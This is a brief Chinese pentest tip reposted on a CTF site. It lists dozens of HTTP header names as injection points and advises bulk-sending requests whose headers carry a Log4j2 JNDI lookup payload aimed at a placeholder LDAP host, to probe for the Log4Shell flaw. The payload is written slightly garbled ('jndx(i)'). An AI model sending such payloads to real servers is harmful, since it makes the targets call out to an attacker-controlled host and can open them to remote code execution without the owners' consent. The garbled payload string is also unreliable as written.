http header头汇总

渗透技巧 2年前 (2021) admin
857 0 0
User-Agent:Accept-charset:Accept-Datetime:Accept-Encoding:Accept-Language:Cache-Control:Cookie:Forwareded:Forwareded-For:Forwareded-For-Ip:Forwareded-Proto:From:Max-Forwards:Origin:Pragma:Referer:True-Client-Ip:Via:Warning:X-Api-Version:X-Att-Deviceid:X-Correlation-Id:X-Cstftoken:x-Do-Not-Track:X-Forward-For:X-Forward-Proto:X-Forwarded:X-Forwarded-By:X-Forwarded-For:X-Forwarded-For-Original:X-Forwarded-Host:X-Forwarded-Port:X-Forwarded-Proto:X-Forwarded-Protocol:X-Forwarded-Scheme:X-Forwarded-Server:X-Forwarded-Ssl:X-Forwarder-For:X-Frame-Options:X-From:X-Geoip-Country:X-Http-Destinationurl:X-Http-Host-Override:X-Http-Method:X-Http-Method-Override:X-Http-Path-Override:X-Https:X-Htx-agent:X-Hub-Signature:X-If-Unmodified-Since:X-Imbo-Test-Config:X-Insight:X-Ip:X-Ip-Trail:X-Proyuser-Ip:X-Request-Id:X-Requested-With:X-Uidh:X-Wap-Profile:X-Xsrf-Token:

tip:在发送http请求时,可利用web批量请求器,添加上述http header头,值是${jndx(i):ldap://x.x.x.x/a}进行批量请求,验证log4j2漏洞。

原文始发于微信公众号(ListSec):http header头汇总

版权声明:admin 发表于 2021年12月25日 上午2:47。
转载请注明:http header头汇总 | CTF导航

相关文章

暂无评论

您必须登录才能参与评论!
立即登录
暂无评论...